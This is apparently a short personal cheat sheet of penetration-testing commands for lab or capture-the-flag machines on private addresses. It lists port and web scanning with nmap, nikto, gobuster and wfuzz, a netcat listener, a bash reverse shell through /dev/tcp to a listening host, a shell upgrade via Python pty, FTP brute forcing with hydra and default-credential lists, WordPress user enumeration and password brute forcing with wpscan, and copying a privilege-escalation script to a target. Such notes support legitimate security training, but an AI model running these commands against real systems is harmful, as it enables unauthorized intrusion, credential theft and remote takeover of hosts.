nikto -h url

sudo nmap -sS -sV --script=default,vuln -p- -T5~ 192.168.1.222

gobuster dir -u http://192.168.1.122/site/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  

$ wfuzz --hc 404 -c -w /usr/share/wordlists/wfuzz/general/common.txt http://192.168.1.122/.FUZZ


nc -nvlp 1234
nc 192.168.49.128 1234

/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.1.15/1234 0>&1'



python -c 'import pty;pty.spawn("/bin/bash")'
OR
python3 -c 'import pty;pty.spawn("/bin/bash")'



nmap -sC -sV -A <ip X.x.x.z>
&
nmap -sC -sV -A -p- 1-65535 <ip X.x.x.z>


add dns entry in /etc/hosts
10.0.0.125 	earth.local terratest.earth.local


 hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 192.168.120.161 ftp
 
 ftp commands:
 passive
 ls 
 dir
 get <file>
 
 use file ommand to get file type
 
 wireshark -r backup 
 to open wireshark file

wpscan –url [wordpress url]
wpscan –url [wordpress url]–enumerate u
wpscan –url [wordpress url]–wordlist [path to wordlist]–username [username to brute force]–threads [number of threads to use]


scp les.sh remote_username@192.168.227.36:/tmp


which wget
to check if app exists
